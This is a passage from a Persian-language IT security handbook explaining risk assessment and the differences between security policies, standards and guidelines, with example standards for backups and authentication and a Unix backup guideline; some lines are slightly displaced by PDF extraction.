‫ﺩﺭ ﺣﺎﻟﺖ ﻋﺎﺩﻱ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻳﻚ ﺳﻴﺎﺳﺖ ﺗﺪﻭﻳﻦ ﻣﻲﺷـﻮﺩ ﻛـﻪ‬
‫ﻻ ﺍﻧﺠـﺎﻡ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ‬
‫ﺑﺎﻳﺪ ﺭﺳﻤﹰﺎ ﻣﻮﺭﺩ ﺗﺒﻌﻴﺖ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﻣﻌﻤـﻮ ﹰ‬
‫ﻳﻚ ﭘﻴﻜﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳـﺖ‪ .‬ﻫـﺪﻑ ﺍﺯ ﺍﻧﺠـﺎﻡ ﺍﺭﺯﻳـﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ﻭ‬
‫ﺗﺤﻠﻴﻞ ﺳﻮﺩ ﻭ ﺯﻳـﺎﻥ ﺍﻭﻟﻮﻳـﺖﺑﻨـﺪﻱ ﺍﻗـﺪﺍﻣﺎﺕ ﻭ ﻧﺤـﻮﺓ ﺻـﺮﻑ‬
‫ﻫﺰﻳﻨﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺑﺮﻧﺎﻣﺔ ﺗﺠﺎﺭﻱ ﺷـﻤﺎ ﻃـﻮﺭﻱ‬
‫ﺑﺎﺷﺪ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﻧﺒﺎﻳﺪ ﺩﺭ ﻃﻮﻝ ﺳﺎﻝ ﻣﺨـﺎﻃﺮﺓ ﺑﻴﻤـﻪﻧـﺸﺪﻩﺍﻱ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻫﺰﻳﻨﺔ ﺁﻥ ﺍﺯ ﻳﻚ ﻣﻘﺪﺍﺭ ﻣﺸﺨﺺ ﺑﺎﻻﺗﺮ ﺑﺎﺷـﺪ‪،‬‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ﺗـﺎ ﻣﺘﻮﺟـﻪ ﺷـﻮﻳﺪ‬
‫ﺑﺮﺍﻱ ﺭﺳﻴﺪﻥ ﺑﻪ ﺍﻳﻦ ﻫﺪﻑ ﺑﺎﻳﺪ ﭼـﻪ ﻫﺰﻳﻨـﻪﻫـﺎﻳﻲ ﺭﺍ ﻣﺘﺤﻤـﻞ‬
‫ﺷﻮﻳﺪ‪ .‬ﺍﻳﻦ ﺍﺭﺯﻳﺎﺑﻲ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺷﻤﺎ ﺭﺍ ﺭﺍﻫﻨﻤﺎﻳﻲ ﻛﻨﺪ ﻛﻪ‬
‫ﻛﺪﺍﻡ ﮔﺎﻡ ﺭﺍ ﺍﻭﻝ ﻭ ﻛﺪﺍﻡ ﮔﺎﻡ ﺭﺍ ﺩﻭﻡ ﺑﺮﺩﺍﺭﻳﺪ‪ ،‬ﻭ ﭼﻪ ﻛﺎﺭﻫـﺎﻳﻲ ﺭﺍ‬
‫ﺑﻪ ﺳﺎﻟﻬﺎﻱ ﺑﻌﺪ ﻣﻮﻛﻮﻝ ﻛﻨﻴﺪ‪ .‬ﻳﻚ ﻓﺎﻳﺪﺓ ﺩﻳﮕﺮ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ‬
‫ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﺪﻳﺮﻳﺖ ﺷﺮﻛﺖ ﻣﺘﻘﺎﻋﺪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺷـﻤﺎ ﺑـﺮﺍﻱ‬
‫ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﻧﻴﺎﺯ ﺑﻪ ﻣﻨﺎﺑﻊ ﺑﻴﺸﺘﺮﻱ ﺩﺍﺭﻳﺪ‪.‬‬
‫‪١٥٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺧﺎﺹ ﺗﺪﻭﻳﻦ ﻛﻨﻴﺪ؛ ﻣﺜﻞ ﺳﻴﺎﺳﺖ ﭘـﺴﺖﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪ ،‬ﺳﻴﺎﺳـﺖ‬
‫ﺩﺍﺩﻩ ﻫﺎﻱ ﻛﺎﺭﻛﻨﺎﻥ ﻭ ﺳﻴﺎﺳـﺖ ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ‪.‬‬
‫ﺳﻮﻣﻴﻦ ﺭﻭﻳﻜﺮﺩﻱ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎ ﺍﺯ ﺁﻥ ﺑﻬﺮﻩ ﺟﺴﺘﻪﺍﻧـﺪ‬
‫ﻭ ﺑﺮﺍﻱ ﺗﻤﺎﻣﻲ ﺷﺮﻛﺘﻬﺎ ﺑﺎ ﺍﻧﺪﺍﺯﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻗﺎﺑﻞ ﺍﺟـﺮﺍ ﺍﺳـﺖ‬
‫ﺩﺍﺷﺘﻦ ﺳﻴﺎﺳﺘﻬﺎ‪ ،‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺳﺎﺩﻩ ﻭ ﻣﺨﺘـﺼﺮ‬
‫ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺑﻬﺒﻮﺩ ﻳﺎﻓﺘﻪﺍﻧﺪ‪ .‬ﺩﺭ ﺍﺩﺍﻣﻪ‪ ،‬ﺭﻭﻳﻜﺮﺩ‬
‫ﺁﺧﺮ ﺭﺍ ﺑﻄﻮﺭ ﺧﻼﺻﻪ ﺗﺸﺮﻳﺢ ﺧﻮﺍﻫﻴﻢ ﻛـﺮﺩ ﻭ ﻣﻨـﺎﺑﻊ ﺑﻴـﺸﺘﺮ ﺩﺭ‬
‫ﺍﻳﻦ ﺭﺍﺑﻄﻪ ﻧﻴﺰ ﺩﺭ ﺑﺨﺶ ﻣﺮﺍﺟﻊ ﻣﻌﺮﻓﻲ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺳﻴﺎﺳﺖ ﺳﻪ ﻧﻘﺶ ﻋﻤﺪﻩ ﺍﻳﻔﺎ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻭﻝ ﻣﺸﺨﺺ ﻣﻲﻛﻨـﺪ ﺍﺯ‬
‫ﭼﻪ ﭼﻴﺰﻱ ﺣﻔﺎﻇﺖ ﻣﻲﺷﻮﺩ ﻭ ﭼﺮﺍ؛ ﺩﻭﻡ ﺍﻳﻨﻜﻪ ﻣﺴﺌﻮﻟﻴﺖ ﻣﺮﺑﻮﻁ‬
‫ﺑﻪ ﺗﺄﻣﻴﻦ ﺍﻳﻦ ﺣﻔﺎﻇﺖ ﺭﺍ ﻣـﺸﺨﺺ ﻣـﻲﻧﻤﺎﻳـﺪ؛ ﻭ ﺳـﻮﻡ ﺍﻳﻨﻜـﻪ‬
‫ﺯﻣﻴﻨﻪﺍﻱ ﺑﺮﺍﻱ ﺗﻔﺴﻴﺮ ﻭ ﺣﻞ ﺩﺭﮔﻴﺮﻳﻬﺎﻳﻲ ﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ‬
‫ﺁﻳﻨﺪﻩ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ ﺍﺭﺍﺋﻪ ﻣﻲ ﺩﻫﺪ‪ .‬ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﺳﻴﺎﺳـﺖ ﻧﺒﺎﻳـﺪ‬
‫ﺑﻴﺎﻳﺪ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﻓﻬﺮﺳﺖ ﺗﻬﺪﻳﺪﻫﺎ‪ ،‬ﻣﺎﺷﻴﻦﺁﻻﺕ ﻭ ﺍﻓﺮﺍﺩ )ﺑـﺎ‬
‫ﻧﺎﻣﻬﺎﻳﺸﺎﻥ(‪ .‬ﺳﻴﺎﺳﺖ ﺑﺎﻳﺪ ﻛﻠﻲ ﺑﺎﺷـﺪ ﻭ ﺩﺭ ﻃـﻮﻝ ﺯﻣـﺎﻥ ﺑﻨـﺪﺭﺕ‬
‫ﺩﭼﺎﺭ ﺗﻐﻴﻴﺮ ﺷﻮﺩ‪.‬‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ‬
‫ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺑﺮﺍﻱ ﻣﻌﺮﻓﻲ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﻣﻨﻴـﺖ ﺩﺭ‬
‫ﻻ ﺍﺯ‬
‫ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ ﻭ ﺩﺭ ﻋﺒﺎﺭﺗﻬـﺎﻱ ﺁﻥ ﻣﻌﻤـﻮ ﹰ‬
‫ﻓﻌﻞ "ﺑﺎﻳﺪ" ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﮔـﺮﺩﺩ‪ .‬ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻋﻤﻮﻣـﹰﺎ ﻣـﺴﺘﻘﻞ ﺍﺯ‬
‫ﺑﺴﺘﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻓﻨﻲ ﺗﻬﻴﻪ ﻣـﻲﺷـﻮﻧﺪ ﻭ ﺣـﺪﺍﻗﻞ ﻳـﻚ ﻣﻌﻴـﺎﺭ‬
‫ﺑﺮﺍﻱ ﺗﻌﻴﻴﻦ ﺍﻳﻨﻜﻪ ﺁﻳﺎ ﺭﻋﺎﻳﺖ ﺷﺪﻩﺍﻧﺪ ﻳﺎ ﻧﻪ ﺭﺍ ﻣﻌﺮﻓﻲ ﻣﻲﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺳﻴﺎﺳﺖ ﭘﺪﻳﺪ ﺁﻣﺪﻩﺍﻧﺪ ﻭ ﺩﺭ ﻃـﻮﻝ‬
‫ﺯﻣﺎﻥ ﺑﻪ ﺁﻫﺴﺘﮕﻲ ﺗﻐﻴﻴﺮ ﻣﻲ ﻛﻨﻨـﺪ‪ .‬ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺩﺭﺑﺮﮔﻴﺮﻧﺪﺓ ﻣﻄﺎﻟﺒﻲ ﺑﺎﺷﻨﺪ ﻣﺎﻧﻨﺪ ﺍﻳﻨﻜﻪ ﺍﺳﺘﺨﺪﺍﻣﻬﺎﻱ ﺟﺪﻳﺪ ﺑﺎﻳـﺪ‬
‫ﭼﮕﻮﻧﻪ ﺍﻧﺠﺎﻡ ﺷـﻮﻧﺪ‪ ،‬ﺍﺯ ﻧـﺴﺨﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﺑﺎﻳـﺪ ﺗـﺎ ﭼـﻪ ﻣـﺪﺗﻲ‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﺑﻌﻤﻞ ﺁﻳﺪ‪ ،‬ﻭ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ UPS‬ﭼﮕﻮﻧﻪ ﻣـﻮﺭﺩ‬
‫ﺁﺯﻣﺎﻳﺶ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺩﺭ ﻣـﻮﺭﺩ ﻧـﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺭﺍ‬
‫ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻥ ﺍﻳﻨﮕﻮﻧﻪ ﺁﻣﺪﻩ ﺑﺎﺷﺪ‪:‬‬
‫ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺎﻳﺪ ﺍﺯ ﺗﻤﺎﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻭ ﺑﺮ‬
‫ﺍﺳﺎﺱ ﻳﻚ ﺑﺮﻧﺎﻣـﺔ ﻣـﻨﻈﻢ ﺯﻣـﺎﻧﻲ ﺗﻬﻴـﻪ ﺷـﻮﻧﺪ‪ .‬ﺩﺭ ﻫـﻴﭻ‬
‫ﺻﻮﺭﺗﻲ ﻋﻤﻠﻴﺎﺕ ﻋﺎﺩﻱ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻧﺒﺎﻳﺪ ﻛﻤﺘﺮ ﺍﺯ ﻳﻜﺒﺎﺭ‬
‫ﺩﺭ ﻫﺮ ﻫﻔﺘﺎﺩ ﻭ ﺩﻭ ﺳﺎﻋﺖ ﺍﻧﺠﺎﻡ ﺷﻮﺩ‪ .‬ﻫﻤﺔ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺎﻳـﺪ‬
‫ﺣﺪﺍﻗﻞ ﺑﺮﺍﻱ ﻳﻚ ﺩﻭﺭﺓ ﺷﺶ ﻣﺎﻫﻪ ﺣﻔﻆ ﺷﻮﻧﺪ؛ ﻭ ﺍﺯ ﺍﻭﻟﻴﻦ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﻣﺎﻫﻬﺎﻱ ﮊﺍﻧﻮﻳﻪ ﻭ ﮊﻭﺋﻦ ﻫﺮ ﺳـﺎﻝ ﺩﺭ ﻳـﻚ ﻣﺤـﻞ‬
‫ﺍﻣﻦ ﺩﺭ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﻫﻤﻴﺸﻪ ﻣﺮﺍﻗﺒـﺖ ﺑـﻪ ﻋﻤـﻞ‬
‫ﻣﻲﺁﻳﺪ‪ .‬ﺣﺪﺍﻗﻞ ﻳﻚ ﻫﻔﺘـﻪ ﺩﺭ ﻣﻴـﺎﻥ ﺑﺎﻳـﺪ ﻳـﻚ ﭘـﺸﺘﻴﺒﺎﻥ‬
‫ﻛﺎﻣــﻞ ﺍﺯ ﻛــﻞ ﺳﻴــﺴﺘﻢ ﺗﻬﻴــﻪ ﺷــﻮﺩ‪ .‬ﻫﻤــﺔ ﺭﺳــﺎﻧﻪﻫــﺎﻱ‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ ﺑﺎﻳـﺪ ﺩﺭ ﻧـﻮﻉ ﺧـﻮﺩ ﻭﺍﺟـﺪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ‬
‫ﭘﺬﻳﺮﻓﺘﻪﺷﺪﺓ ﺻﻨﻌﺘﻲ ﺑﺎﺷﻨﺪ ﺗـﺎ ﺣـﺪﺍﻗﻞ ﺑﻌـﺪ ﺍﺯ ﭘـﻨﺞ ﺳـﺎﻝ‬
‫ﺑﺎﻗﻲﻣﺎﻧﺪﻥ ﺩﺭ ﻳﻚ ﺍﻧﺒﺎ ﹺﺭ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺐ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﺁﻧﻬﺎ‬
‫ﺑﺎﺯ ﻫﻢ ﻗﺎﺑﻞ ﺑﺎﺯﻳﺎﺑﻲ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻳﻦ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﻧـﺎﻡ ﻫـﻴﭻ ﻣﻜـﺎﻧﻴﺰﻡ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ ﻳـﺎ ﺑـﺴﺘﺔ‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺧﺎﺹ ﺭﺍ ﺫﻛﺮ ﻧﻤﻲﻛﻨﺪ؛ ﻫﺮﭼﻨﺪ ﺁﻥ ﭼﻴﺰﻱ ﻛـﻪ ﺑﺎﻳـﺪ‬
‫ﺫﺧﻴﺮﻩ ﺷﻮﺩ ﻭ ﺍﻳﻨﻜﻪ ﺑﺮﺍﻱ ﭼﻪ ﻣﺪﺕ ﺑﺎﻳﺪ ﺫﺧﻴـﺮﻩ ﮔـﺮﺩﺩ ﻭ ﭼﻨـﺪ‬
‫ﻭﻗﺖ ﻳﻜﺒﺎﺭ ﺑﺎﻳﺪ ﺍﻳﻨﻜﺎﺭ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ ﺭﺍ ﺑﻮﺿﻮﺡ ﻋﻨﻮﺍﻥ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﻌﻘﻮﻝ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‪:‬‬
‫ﺩﺭ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﭼﻨﺪﻛﺎﺭﺑﺮﻩ ﻫﺮ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺑﺎﻳﺪ ﺗﻨﻬﺎ ﻳﻚ‬
‫ﻛﺎﺭﺑﺮ ﻣﺠﺎﺯ ﺑﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪ .‬ﺁﻥ ﻛـﺎﺭﺑﺮ ﺑﺎﻳـﺪ‬
‫ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻧـﺸﺎﻧﺔ ﺗﺄﻳﻴﺪﻛﻨﻨـﺪﻩ ﺑـﺮﺍﻱ‬
‫ﺳﻴﺴﺘﻢ ﺍﺛﺒﺎﺕ ﻧﻤﺎﻳﺪ‪ .‬ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻣﻲ ﺗـﻮﺍﻥ‬
‫ﺑﻮﺳــﻴﻠﺔ ﻳــﻚ ﻧــﺸﺎﻥ ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ‪ ،٧٨‬ﻳــﻚ ﻛــﺎﺭﺕ‬
‫ﻫﻮﺷﻤﻨﺪ‪ ،٧٩‬ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻳﻜﺒﺎﺭ ﻣـﺼﺮﻑ‪ ،‬ﻳـﺎ ﻳـﻚ ﻣﻌﻴـﺎﺭ‬
‫ﻲ‪ ٨٠‬ﺗﺄﻳﻴﺪﺷﺪﻩ ﺻﻮﺭﺕ ﺩﺍﺩ‪ .‬ﺩﺭ ﻫﻴﭻ ﺩﺳﺘﮕﺎﻩ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﺯﻳﺴﺘ ﹺ‬
‫ﻛﻪ ﺗﺎﻛﻨﻮﻥ ﺑﻪ ﺷﺒﻜﻪ ﻭﺻﻞ ﺷﺪﻩ‪ ،‬ﻗﺎﺑﻞ ﺣﻤﻞ ﺑـﻪ ﺧـﺎﺭﺝ ﺍﺯ‬
‫ﺷﺮﻛﺖ ﺑﻮﺩﻩ‪ ،‬ﻳﺎ ﺑﻴﺮﻭﻥ ﺍﺯ ﺩﻓﺘـﺮ ﺧـﺼﻮﺻﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻗﺮﺍﺭﮔﺮﻓﺘﻪ‪ ،‬ﻧﺒﺎﻳـﺪ ﺍﺯ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺗﻜﺮﺍﺭﺷـﺪﻧﻲ ﺑﻌﻨـﻮﺍﻥ‬
‫ﻣﻜﺎﻧﻴﺰﻡ ﺍﺻﻠﻲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫ﺭﺍﻫﺒﺮﺩﻫﺎ‬
‫ﻻ ﺩﺭ ﺁﻧﻬـﺎ ﻓﻌـﻞ‬
‫ﺭﺍﻫﺒﺮﺩﻫﺎ )ﺧﻂﻣﺸﻲﻫﺎ( ﺍﺳﻨﺎﺩﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫"ﺑﻬﺘﺮ ﺍﺳﺖ" ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ .‬ﻫﺪﻑ ﺭﺍﻫﺒﺮﺩﻫـﺎ ﺗﻔـﺴﻴﺮ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ‬
‫ﺑﺮﺍﻱ ﻳﻚ ﻣﺤﻴﻂ ﺧﺎﺹ‪ -‬ﻳﻚ ﻣﺤﻴﻂ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻳﺎ ﻳﻚ ﻣﺤﻴﻂ‬
‫ﻓﻴﺰﻳﻜﻲ ‪ -‬ﻣﻲﺑﺎﺷﺪ‪ .‬ﺑﺮﺧﻼﻑ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ‪ ،‬ﺭﺍﻫﺒﺮﺩﻫﺎ ﺩﺭﺻـﻮﺭﺕ‬
‫ﻧﻴﺎﺯ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﺍﺟﺰﺍﻱ ﺳﻴﺎﺳﺖ‪ ،‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺍﺯ ﻧﺎﻣﺸﺎﻥ‬
‫ﻻ ﻣﺜﻞ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻛﺎﺭﺍﻳﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﭘﻴﺪﺍﺳﺖ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫ﻧﻤﻲﮔﻴﺮﻧﺪ‪ ،‬ﺑﻠﻜﻪ ﺑﺼﻮﺭﺕ ﺭﺍﻫﻬﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﺍﻧﺠـﺎﻡ ﻛـﺎﺭ ﻛﻤـﻚ‬
‫ﻣﻲﻛﻨﻨﺪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪.‬‬
‫ﻼ ﻳﻚ ﻧﻤﻮﻧﻪ ﺭﺍﻫﺒﺮﺩ ﺩﺭ ﻣﻮﺭﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺎﻥ ﺁﻣﺪﻩ ﺍﺳﺖ‪:‬‬
‫ﺫﻳ ﹰ‬
‫‪Authentication Token‬‬
‫‪Smart Card‬‬
‫‪Biometric‬‬
‫‪78‬‬
‫‪79‬‬
‫‪80‬‬
‫‪١٥١‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺩﺭ ﻣﺎﺷﻴﻨﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻳﻮﻧﻴﻜﺲ ﺑﺎﻳﺪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺍﺯ ﺑﺮﻧﺎﻣــﺔ "‪ "dump‬ﺗﻬﻴــﻪ ﺷــﻮﻧﺪ‪ .‬ﺗﻬﻴــﺔ ﭘــﺸﺘﻴﺒﺎﻥ ﺍﺯ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ‪ ۲۴‬ﺳﺎﻋﺖ ﺷـﺒﺎﻧﻪﺭﻭﺯ ﺍﺯ ﺁﻧﻬـﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻧﻤﻲﺷﻮﺩ ﺑﺎﻳﺪ ﺩﺭ ﻃﻮﻝ ﺷﺐ ﻭ ﺩﺭ ﺣﺎﻟﺖ ﺗﻚﻛـﺎﺭﺑﺮﻩ ﺍﻧﺠـﺎﻡ‬
‫ﺷﻮﺩ‪ .‬ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ‪ ۲۴‬ﺳﺎﻋﺘﻪ ﺩﺭﺣـﺎﻝ‬
‫ﻓﻌﺎﻟﻴﺖ ﻫﺴﺘﻨﺪ ﺑﺎﻳـﺪ ﺩﺭ ﺯﻣـﺎﻥ ﻧﺰﺩﻳﻜﺘـﺮﻳﻦ ﺗﻐﻴﻴـﺮ ﺷـﻴﻔﺖ‬
‫ﻛﺎﺭﻱ ﺑﻪ ﻧﻴﻤﻪﺷﺐ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ )ﺯﻣﺎﻧﻲ ﻛﻪ ﺑﺎﺭ ﻛﺎﺭﻱ ﺳﻴـﺴﺘﻢ‬
‫ﺍﺯ ﻫﻤﻴﺸﻪ ﻛﻤﺘﺮ ﺍﺳﺖ(‪ .‬ﺗﻤﺎﻡ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺑﻼﻓﺎﺻـﻠﻪ‬
‫ﭘﺲ ﺍﺯ ﻧﻮﺷﺘﻪ ﺷﺪﻥ ﺑﺎﻳﺪ ﻣﺠﺪﺩﹰﺍ ﺧﻮﺍﻧﺪﻩ ﺷـﻮﻧﺪ ﺗـﺎ ﺻـﺤﺖ‬
‫ﺍﻃﻼﻋﺎﺕ ﻧﻮﺷﺘﻪﺷﺪﻩ ﺑﻪ ﺗﺄﻳﻴﺪ ﺑﺮﺳﺪ‪.‬‬
‫ﺩﺭ ﺍﻭﻟﻴﻦ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻣﺎﻫﻬﺎﻱ ﮊﺍﻧﻮﻳﻪ ﻭ ﮊﻭﺋﻦ‪ ،‬ﭘـﺸﺘﻴﺒﺎﻥ‬
‫ﺳﻄﺢ ﺻﻔﺮ‪ ٨١‬ﺗﻬﻴﻪ ﻣﻲﺷﻮﺩ‪ .‬ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺳـﻄﺢ ‪ ۳‬ﺑﺎﻳـﺪ‬
‫ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺩﺭ ﻫﺮ ﻫﻔﺘﻪ ﻳﻚ ﻓﺎﻳﻞ ﺭﺍ ﺑﺼﻮﺭﺕ ﺗـﺼﺎﺩﻓﻲ‬
‫ﺍﺯ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻥ ﻛﻪ ﺩﺭ ﻫﻤﺎﻥ ﻫﻔﺘـﻪ ﺗﻬﻴـﻪ ﺷـﺪﻩ ﺍﻧﺘﺨـﺎﺏ‬
‫ﻣﻲﻛﻨﺪ ﺗﺎ ﻛﺎﺭﻣﻨـﺪ ﺑﺨـﺶ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ ﺑـﺮﺍﻱ ﻛـﺴﺐ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻋﻤﻠﻜﺮﺩ ﺻﺤﻴﺢ ﺭﻭﺍﻟﻬﺎﻱ ﺗﻬﻴﺔ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ‪،‬‬
‫ﺁﻥ ﻓﺎﻳﻞ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺎﺯﻳﺎﺑﻲ ﻛﻨﺪ‪.‬‬
‫ﺭﺍﻫﺒﺮﺩﻫﺎ ﺑﺮﺍﻱ ﻣﻌﻤﺎﺭﻳﻬﺎﻱ ﺧﺎﺹ ﻭ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﻭﻳـﮋﻩ ﺗﻬﻴـﻪ‬
